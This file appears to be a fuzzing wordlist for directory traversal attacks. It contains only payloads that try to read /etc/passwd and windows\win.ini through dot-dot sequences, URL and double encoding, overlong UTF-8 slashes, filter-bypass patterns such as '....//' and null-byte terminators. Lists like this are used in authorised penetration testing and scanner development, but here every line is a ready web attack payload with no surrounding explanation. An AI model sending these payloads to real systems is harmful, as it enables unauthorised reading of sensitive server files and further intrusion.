../../../etc/passwd
../../etc/passwd
../etc/passwd
/etc/passwd
%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
%2E%2E%2Fetc%2Fpasswd
%2Fetc%2Fpasswd
..\..\..\windows\win.ini
..\..\windows\win.ini
..\windows\win.ini
\windows\win.ini
%2E%2E%5C%2E%2E%5C%2E%2E%5Cwindows%5Cwin%2Eini
%2E%2E%5C%2E%2E%5Cwindows%5Cwin%2Eini
%2E%2E%5Cwindows%5Cwin%2Eini
%5Cwindows%5Cwin%2Eini
....//....//....//etc/passwd
....//....//etc/passwd
....//etc/passwd
....\/....\/....\/windows\win.ini
....\/....\/windows\win.ini
....\/windows\win.ini
\/windows/\win.ini
%2E%2E%2E%2E%5C%2F%2E%2E%2E%2E%5C%2F%2E%2E%2E%2E%5C%2Fwindows%5Cwin%2Eini
%2E%2E%2E%2E%5C%2F%2E%2E%2E%2E%5C%2Fwindows%5Cwin%2Eini
%2E%2E%2E%2E%5C%2Fwindows%5Cwin%2Eini
%5C%2Fwindows%2F%5Cwin%2Eini
%2E%2E%2E%2E%2F%2F%2E%2E%2E%2E%2F%2F%2E%2E%2E%2E%2F%2Fetc%2Fpasswd
%2E%2E%2E%2E%2F%2F%2E%2E%2E%2E%2F%2Fetc%2Fpasswd
%2E%2E%2E%2E%2F%2Fetc%2Fpasswd
..%252f..%252f..%252fetc%2Fpasswd
..%252f..%252fetc%2Fpasswd
..%252fetc%2Fpasswd
%2fetc%2Fpasswd
..%c0%af..%c0%af..%c0%afetc%afpasswd
..%c0%af..%c0%afetc%afpasswd
..%c0%afetc%afpasswd
%afetc%afpasswd
../../../etc/passwd%00
../../etc/passwd%00
../etc/passwd%00
/etc/passwd%00
%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd%00
%2E%2E%2F%2E%2E%2Fetc%2Fpasswd%00
%2E%2E%2Fetc%2Fpasswd%00
%2Fetc%2Fpasswd%00
..\..\..\windows\win.ini%00
..\..\windows\win.ini%00
..\windows\win.ini%00
\windows\win.ini%00
....//....//....//etc/passwd%00
....//....//etc/passwd%00
....//etc/passwd%00
....\/....\/....\/windows\win.ini%00
....\/....\/windows\win.ini%00
....\/windows\win.ini%00
\/windows/\win.ini%00
